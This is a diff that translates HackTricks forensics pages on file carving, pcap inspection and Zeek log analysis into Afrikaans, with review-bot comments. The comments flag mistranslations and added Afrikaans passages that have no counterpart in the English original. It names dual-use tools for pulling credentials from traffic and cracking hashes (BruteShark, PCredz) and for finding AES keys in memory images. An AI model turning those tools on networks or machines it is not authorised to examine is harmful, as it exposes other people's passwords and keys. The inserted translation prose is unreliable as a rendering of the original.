This tool can scan an image and will **extract pcaps** inside it, **network information\(URLs, domains, IPs, MACs, mails\)** and more **files**. You only have to do:
|
||||
Hierdie instrument kom binne kali, maar jy kan dit hier vind: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor)
|
||||
|
||||
Hierdie instrument kan 'n beeld skandeer en sal **pcaps onttrek** binne dit, **netwerkinligting\(URL's, domeine, IP's, MAC's, e-posse\)** en meer **lêers**. Jy hoef net die volgende te doen:
|
||||
```text
|
||||
bulk_extractor memory.img -o out_folder
|
||||
```
|
||||
|
||||
Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/)\), search for **weird domains** \(domains related to **malware** or **non-existent**\).
|
||||
Navigeer deur **alle inligting** wat die instrument ingesamel het \(wagwoorde?\), **analiseer** die **pakkies** \(lees [**Pcaps-analise**](../pcap-inspection/)\), soek na **vreemde domeine** \(domeine wat verband hou met **kwaadwillige sagteware** of **nie-bestaande**\).
|
||||
|
||||
## PhotoRec
|
||||
|
||||
You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
|
||||
Jy kan dit vind by [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
|
||||
|
||||
It comes with GUI and CLI version. You can select the **file-types** you want PhotoRec to search for.
|
||||
Dit kom met 'n GUI- en CLI-weergawe. Jy kan die **lêertipes** kies wat PhotoRec moet soek.
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28524%29.png)
|
||||
|
||||
# Specific Data Carving Tools
|
||||
# Spesifieke Data Carving-instrumente
|
||||
|
||||
## FindAES
|
||||
|
||||
Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker.
|
||||
Soek na AES-sleutels deur te soek na hul sleutelskedules. In staat om 128, 192 en 256 bit sleutels te vind, soos dié wat deur TrueCrypt en BitLocker gebruik word.
|
||||
|
||||
Download [here](https://sourceforge.net/projects/findaes/).
|
||||
Laai [hier af](https://sourceforge.net/projects/findaes/).
|
||||
|
||||
# Complementary tools
|
||||
# Aanvullende instrumente
|
||||
|
||||
You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal.
|
||||
You can use the linux command line tool **pdftotext** to transform a pdf into text and read it.
|
||||
Jy kan [**viu** ](https://github.com/atanunq/viu)gebruik om beelde vanuit die terminaal te sien.
|
||||
Jy kan die Linux-opdraglyn-instrument **pdftotext** gebruik om 'n pdf in te omskep na teks en dit te lees.
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
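Review bot: this file is an older duplicate of the carving-tools page in the previous hunk, and the two translations disagree on terminology: the title here is "# Uitsnygereedskap" while the sibling uses "# Carving & Herstelgereedskap", and later headings in this same file keep "Carving" untranslated ("# Spesifieke Data Carving-instrumente"); settle on one term for "carving" across both files. The `#Insllation` typo in the Binwalk block is repeated here. Under "Aanvullende instrumente", "'n pdf in te omskep na teks" is ungrammatical; "om 'n pdf na teks om te skakel" reads correctly. The Bulk Extractor paragraph still carries the escaped parentheses `\(URL's, domeine, IP's, MAC's, e-posse\)` from the old markdown; the sibling file dropped them and this one should too.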
@ -1,158 +1,189 @@
|
|||
# Pcap Inspection
|
||||
# Pcap Inspeksie
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
|
||||
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
{% hint style="info" %}
|
||||
A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools.
|
||||
'n Nota oor **PCAP** vs **PCAPNG**: daar is twee weergawes van die PCAP-lêerformaat; **PCAPNG is nuwer en nie deur alle gereedskap ondersteun nie**. Jy mag 'n lêer van PCAPNG na PCAP moet omskakel deur Wireshark of 'n ander kompatibele gereedskap te gebruik, om daarmee te werk in ander gereedskap.
|
||||
{% endhint %}
|
||||
|
||||
## Online tools for pcaps
|
||||
## Aanlyn gereedskap vir pcaps
|
||||
|
||||
* If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
|
||||
* Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com)
|
||||
* Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)
|
||||
* As die kop van jou pcap **beskadig** is, moet jy probeer om dit te **herstel** deur gebruik te maak van: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
|
||||
* Onttrek **inligting** en soek na **kwaadwillige sagteware** binne 'n pcap in [**PacketTotal**](https://packettotal.com)
|
||||
* Soek na **skadelike aktiwiteit** deur gebruik te maak van [**www.virustotal.com**](https://www.virustotal.com) en [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)
|
||||
|
||||
## Extract Information
|
||||
## Onttrek Inligting
|
||||
|
||||
The following tools are useful to extract statistics, files, etc.
|
||||
Die volgende gereedskap is nuttig om statistieke, lêers, ens. te onttrek.
|
||||
|
||||
### Wireshark
|
||||
|
||||
{% hint style="info" %}
|
||||
**If you are going to analyze a PCAP you basically must to know how to use Wireshark**
|
||||
**As jy 'n PCAP gaan analiseer, moet jy basies weet hoe om Wireshark te gebruik**
|
||||
{% endhint %}
|
||||
|
||||
You can find some Wireshark tricks in:
|
||||
Jy kan 'n paar Wireshark-truuks vind in:
|
||||
|
||||
{% content-ref url="wireshark-tricks.md" %}
|
||||
[wireshark-tricks.md](wireshark-tricks.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Xplico Framework
|
||||
### Xplico-raamwerk
|
||||
|
||||
[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico, extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
|
||||
|
||||
**Install**
|
||||
[**Xplico** ](https://github.com/xplico/xplico)_(slegs Linux)_ kan 'n **pcap** analiseer en inligting daaruit onttrek. Byvoorbeeld, van 'n pcap-lêer onttrek Xplico elke e-pos (POP, IMAP en SMTP-protokolle), alle HTTP-inhoud, elke VoIP-oproep (SIP), FTP, TFTP, en so aan.
|
||||
|
||||
**Installeer**
|
||||
```bash
|
||||
sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list'
|
||||
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE
|
||||
sudo apt-get update
|
||||
sudo apt-get install xplico
|
||||
```
|
||||
|
||||
**Run**
|
||||
|
||||
**Voer uit**
|
||||
```
|
||||
/etc/init.d/apache2 restart
|
||||
/etc/init.d/xplico start
|
||||
```
|
||||
Kry toegang tot _**127.0.0.1:9876**_ met geloofsbriewe _**xplico:xplico**_
|
||||
|
||||
Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_
|
||||
|
||||
Then create a **new case**, create a **new session** inside the case and **upload the pcap** file.
|
||||
Skep dan 'n **nuwe saak**, skep 'n **nuwe sessie** binne die saak en **laai die pcap-lêer op**.
|
||||
|
||||
### NetworkMiner
|
||||
|
||||
Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download** [**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**.\
|
||||
This tool is also useful to get **other information analysed** from the packets in order to be able to know what was happening in a **quicker** way.
|
||||
Soos Xplico is dit 'n instrument om **analiseer en voorwerpe uit pcaps te onttrek**. Dit het 'n gratis uitgawe wat jy kan **aflaai** [**hier**](https://www.netresec.com/?page=NetworkMiner). Dit werk met **Windows**.\
|
||||
Hierdie instrument is ook nuttig om **ander inligting geanaliseer** uit die pakkies te kry om te kan weet wat in 'n **vinniger** manier gebeur het.
|
||||
|
||||
### NetWitness Investigator
|
||||
|
||||
You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\
|
||||
This is another useful tool that **analyses the packets** and sorts the information in a useful way to **know what is happening inside**.
|
||||
Jy kan [**NetWitness Investigator hier aflaai**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Dit werk in Windows)**.\
|
||||
Dit is 'n ander nuttige instrument wat die pakkies **analiseer** en die inligting op 'n nuttige manier **sorteer om te weet wat binne gebeur**.
|
||||
|
||||
### [BruteShark](https://github.com/odedshimon/BruteShark)
|
||||
|
||||
* Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...)
|
||||
* Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
|
||||
* Build a visual network diagram (Network nodes & users)
|
||||
* Extract DNS queries
|
||||
* Reconstruct all TCP & UDP Sessions
|
||||
* File Carving
|
||||
* Uitpak en enkode gebruikersname en wagwoorde (HTTP, FTP, Telnet, IMAP, SMTP...)
|
||||
* Onttrek verifikasiehasings en kraak hulle met behulp van Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
|
||||
* Bou 'n visuele netwerkdiagram (Netwerknodes & gebruikers)
|
||||
* Onttrek DNS-navrae
|
||||
* Herkonstrueer alle TCP- en UDP-sessies
|
||||
* Lêer uitsnyding
|
||||
|
||||
### Capinfos
|
||||
|
||||
```
|
||||
capinfos capture.pcap
|
||||
```
|
||||
|
||||
### Ngrep
|
||||
|
||||
If you are **looking** for **something** inside the pcap you can use **ngrep**. Here is an example using the main filters:
|
||||
As jy **iets** binne die pcap soek, kan jy **ngrep** gebruik. Hier is 'n voorbeeld wat die hooffilters gebruik:
|
||||
|
||||
```bash
|
||||
ngrep -I file.pcap 'filter'
|
||||
```
|
||||
|
||||
Die `-I` vlag dui aan dat die bron 'n lêer is, en `file.pcap` is die naam van die pcap-lêer wat jy wil ondersoek. Die `'filter'` argument is die soekfilter wat jy wil gebruik om spesifieke data te vind binne die pcap-lêer.
|
||||
|
||||
Hier is 'n paar voorbeelde van ngrep-filters wat jy kan gebruik:
|
||||
|
||||
- `tcp` - Soek na TCP-verbindings.
|
||||
- `udp` - Soek na UDP-verbindings.
|
||||
- `port 80` - Soek na verbindings op poort 80.
|
||||
- `host 192.168.1.1` - Soek na verbindings na die IP-adres 192.168.1.1.
|
||||
- `src host 192.168.1.1` - Soek na verbindings waarvan die bron-IP-adres 192.168.1.1 is.
|
||||
- `dst host 192.168.1.1` - Soek na verbindings waarvan die bestemmings-IP-adres 192.168.1.1 is.
|
||||
|
||||
Jy kan ook meer komplekse filters gebruik deur logiese operatore soos `and`, `or` en `not` te gebruik. Byvoorbeeld:
|
||||
|
||||
- `tcp and port 80` - Soek na TCP-verbindings op poort 80.
|
||||
- `udp or port 53` - Soek na UDP-verbindings of verbindings op poort 53.
|
||||
- `not host 192.168.1.1` - Soek na verbindings wat nie na die IP-adres 192.168.1.1 gaan nie.
|
||||
|
||||
Met ngrep kan jy spesifieke data binne die pcap-lêer vind deur die filters te gebruik wat die beste by jou ondersoek pas.
|
||||
```bash
|
||||
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
|
||||
```
|
||||
### Uithol
|
||||
|
||||
### Carving
|
||||
|
||||
Using common carving techniques can be useful to extract files and information from the pcap:
|
||||
Die gebruik van algemene uitholtegnieke kan nuttig wees om lêers en inligting uit die pcap te onttrek:
|
||||
|
||||
{% content-ref url="../partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
|
||||
[file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Capturing credentials
|
||||
### Vang van geloofsbriewe
|
||||
|
||||
You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface.
|
||||
Jy kan gereedskap soos [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) gebruik om geloofsbriewe uit 'n pcap of 'n lewendige koppelvlak te ontled.
|
||||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
|
||||
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteitsgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline.
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
## Check Exploits/Malware
|
||||
## Kontroleer Uitbuitings/Malware
|
||||
|
||||
### Suricata
|
||||
|
||||
**Install and setup**
|
||||
|
||||
**Installeer en stel op**
|
||||
```
|
||||
apt-get install suricata
|
||||
apt-get install oinkmaster
|
||||
echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
|
||||
oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
|
||||
```
|
||||
**Kyk na pcap**
|
||||
|
||||
**Check pcap**
|
||||
Om 'n pcap-lêer te ondersoek, kan jy die volgende stappe volg:
|
||||
|
||||
1. **Identifiseer die doel van die ondersoek**: Bepaal wat jy probeer vind of bewys in die pcap-lêer.
|
||||
|
||||
2. **Installeer 'n pcap-analisehulpmiddel**: Gebruik 'n geskikte hulpmiddel soos Wireshark om die pcap-lêer te ontleed en te ondersoek.
|
||||
|
||||
3. **Analiseer die netwerkverkeer**: Bestudeer die verskillende netwerkverbindings en -protokolle in die pcap-lêer. Identifiseer verdagte aktiwiteite, ongewone patrone of enige ander potensiële aanwysers van 'n aanval.
|
||||
|
||||
4. **Identifiseer die bronne en bestemmings**: Kyk na die bron- en bestemmings-IP-adresse en -poorte om te bepaal watter entiteite betrokke is by die kommunikasie. Identifiseer enige onbekende of verdagte bronne of bestemmings.
|
||||
|
||||
5. **Ondersoek die inhoud van die kommunikasie**: Ontleed die inhoud van die kommunikasie in die pcap-lêer. Kyk na die datastrome, HTTP-aanvrae, e-posse, enige gevoelige inligting of enige ander relevante inligting wat kan help om die aard van die aanval of die kommunikasie te bepaal.
|
||||
|
||||
6. **Volg die tydlyn**: Analiseer die tydlyn van die netwerkverkeer om die volgorde van gebeure te bepaal en om te sien of daar enige tydgebaseerde patrone of verdagte aktiwiteite is.
|
||||
|
||||
7. **Identifiseer enige verdagte aktiwiteite**: Let op enige verdagte aktiwiteite, soos ongewone poorte, onbekende protokolle, ongewone datastrome, onverwagte kommunikasiepatrone, of enige ander afwykings van normale netwerkgedrag.
|
||||
|
||||
8. **Verkry aanvullende inligting**: Indien nodig, gebruik ander tegnieke soos DNS-navrae, WHOIS-opsoek, IP-adresopsporing, of enige ander relevante inligting om verdere konteks te verkry oor die bronne of bestemmings in die pcap-lêer.
|
||||
|
||||
9. **Stel 'n verslag op**: Maak 'n gedetailleerde verslag van jou bevindinge, insluitend enige verdagte aktiwiteite, potensiële aanwysers van 'n aanval, en enige ander relevante inligting.
|
||||
```
|
||||
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
|
||||
```
|
||||
|
||||
### YaraPcap
|
||||
|
||||
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that
|
||||
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is 'n instrument wat
|
||||
|
||||
* Reads a PCAP File and Extracts Http Streams.
|
||||
* gzip deflates any compressed streams
|
||||
* Scans every file with yara
|
||||
* Writes a report.txt
|
||||
* Optionally saves matching files to a Dir
|
||||
* 'n PCAP-lêer lees en HTTP-strome onttrek.
|
||||
* gzip defleer enige gekomprimeerde strome
|
||||
* Skandeer elke lêer met yara
|
||||
* Skryf 'n report.txt
|
||||
* Opsioneel stoor ooreenstemmende lêers in 'n gids
|
||||
|
||||
### Malware Analysis
|
||||
### Malware-analise
|
||||
|
||||
Check if you can find any fingerprint of a known malware:
|
||||
Kyk of jy enige vingerafdruk van 'n bekende malware kan vind:
|
||||
|
||||
{% content-ref url="../malware-analysis.md" %}
|
||||
[malware-analysis.md](../malware-analysis.md)
|
||||
|
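Review bot: The translated side of this hunk adds prose that has no counterpart in the English original, so the diff is no longer a 1:1 translation. Under `### Ngrep`, the lines from `Die \`-I\` vlag dui aan dat die bron 'n lêer is ...` through `Met ngrep kan jy spesifieke data binne die pcap-lêer vind ...` (a filter tutorial with `tcp`, `udp`, `port 80` and `host` examples) are inserted between the two original `ngrep` code blocks; under `**Check pcap**`, a nine-step generic procedure (`1. **Identifiseer die doel van die ondersoek**` through `9. **Stel 'n verslag op**`) is inserted between the heading and the `suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log` fence, with no blank line before the fence. Drop these inserted passages so the page keeps the original's structure, or send them as a separate, reviewed change. Separately, `### Uithol` ("hollow out") for `### Carving` and `Lêer uitsnyding` for `File Carving` lose the technical term; keeping "carving" as a loanword, as the rest of the page does for tool names, would read better.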
@ -160,12 +191,11 @@ Check if you can find any fingerprint of a known malware:
|
|||
|
||||
## Zeek
|
||||
|
||||
> [Zeek](https://docs.zeek.org/en/master/about.html) is a passive, open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting.
|
||||
> [Zeek](https://docs.zeek.org/en/master/about.html) is 'n passiewe, oopbron-netwerkverkeerontleder. Baie operateurs gebruik Zeek as 'n Netwerksekuriteitsmonitor (NSM) om ondersoeke na verdagte of skadelike aktiwiteit te ondersteun. Zeek ondersteun ook 'n wye reeks verkeersontledingsopdragte buite die sekuriteitsdomein, insluitend prestasiemeting en foutopsporing.
|
||||
|
||||
Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are.
|
||||
|
||||
### Connections Info
|
||||
Basies is logboeke wat deur `zeek` geskep word nie **pcaps** nie. Jy sal dus **ander instrumente** moet gebruik om die logboeke waar die **inligting** oor die pcaps is, te analiseer.
|
||||
|
||||
### Verbindingsinligting
|
||||
```bash
|
||||
#Get info about longest connections (add "grep udp" to see only udp traffic)
|
||||
#The longest connection might be of malware (constant reverse shell?)
|
||||
|
@ -215,9 +245,35 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top
|
|||
1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0
|
||||
0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0
|
||||
```
|
||||
### DNS-inligting
|
||||
|
||||
### DNS info
|
||||
DNS (Domain Name System) is 'n protokol wat gebruik word om IP-adresse aan domeinname te koppel. Dit vertaal mensverstaanbare domeinname na numeriese IP-adresse wat deur rekenaars gebruik word om met mekaar te kommunikeer.
|
||||
|
||||
DNS-inligting kan waardevol wees vir forensiese ondersoeke, omdat dit kan help om die aktiwiteite van 'n gebruiker of 'n aanvaller te identifiseer. Deur 'n PCAP (Packet Capture) te ondersoek, kan jy DNS-verkeer analiseer en inligting verkry soos die IP-adresse van besoekte webwerwe, DNS-navrae en DNS-antwoorde.
|
||||
|
||||
Hier is 'n paar nuttige DNS-inligting wat jy uit 'n PCAP kan ontleed:
|
||||
|
||||
#### DNS-navrae
|
||||
|
||||
DNS-navrae is versoek wat deur 'n rekenaar gestuur word om die IP-adres van 'n spesifieke domeinnaam te bekom. Dit kan aandui watter webwerwe of dienste besoek is.
|
||||
|
||||
#### DNS-antwoorde
|
||||
|
||||
DNS-antwoorde is die reaksies wat deur DNS-bedieners gestuur word om die IP-adres van 'n gevraagde domeinnaam te verskaf. Dit kan aandui watter IP-adresse besoek is en of daar enige ongewone of verdagte aktiwiteite plaasgevind het.
|
||||
|
||||
#### DNS-tydskrifte
|
||||
|
||||
DNS-tydskrifte is 'n log van DNS-navrae en -antwoorde wat deur 'n rekenaar gestuur en ontvang is. Dit kan gebruik word om die volledige DNS-geskiedenis van 'n rekenaar te ontleed en te analiseer.
|
||||
|
||||
#### DNS-gebruikers
|
||||
|
||||
DNS-gebruikers is die rekenaars of toestelle wat DNS-navrae en -antwoorde genereer. Deur die identifisering van hierdie gebruikers kan jy die bron van 'n spesifieke DNS-verkeer bepaal.
|
||||
|
||||
#### DNS-tydskrif-analise
|
||||
|
||||
DNS-tydskrif-analise behels die ontleed van DNS-tydskrifte om inligting te verkry oor die aktiwiteite van 'n rekenaar of netwerk. Dit kan help om verdagte aktiwiteite, soos die besoek van skadelike webwerwe of die kommunikasie met verdagte IP-adresse, te identifiseer.
|
||||
|
||||
Deur die inspeksie van DNS-inligting in 'n PCAP, kan jy waardevolle insigte verkry oor die aktiwiteite van 'n rekenaar of netwerk en dit gebruik vir forensiese analise.
|
||||
```bash
|
||||
#Get info about each DNS request performed
|
||||
cat dns.log | zeek-cut -c id.orig_h query qtype_name answers
|
||||
|
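Review bot: The lines between `### DNS-inligting` and the `bash` fence (`DNS (Domain Name System) is 'n protokol ...` through `Deur die inspeksie van DNS-inligting in 'n PCAP ...`, including the five new `####` subheadings) translate nothing in the original, which goes straight from `### DNS info` to the code block; they should be removed so the hunk remains a translation rather than new content. If any of it is kept, `#### DNS-tydskrifte` and `#### DNS-tydskrif-analise` mistranslate "logs" as "tydskrifte" (magazines) and should use "logboeke", the word the Zeek paragraph above already uses. Also add a blank line before the ```` ```bash ```` fence, which now directly follows the last inserted paragraph.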
@ -234,8 +290,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
|
|||
#See top DNS domain requested with rita
|
||||
rita show-exploded-dns -H --limit 10 zeek_logs
|
||||
```
|
||||
|
||||
## Other pcap analysis tricks
|
||||
## Ander pcap-analise-truuks
|
||||
|
||||
{% content-ref url="dnscat-exfiltration.md" %}
|
||||
[dnscat-exfiltration.md](dnscat-exfiltration.md)
|
||||
|
@ -253,20 +308,20 @@ rita show-exploded-dns -H --limit 10 zeek_logs
|
|||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
|
||||
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
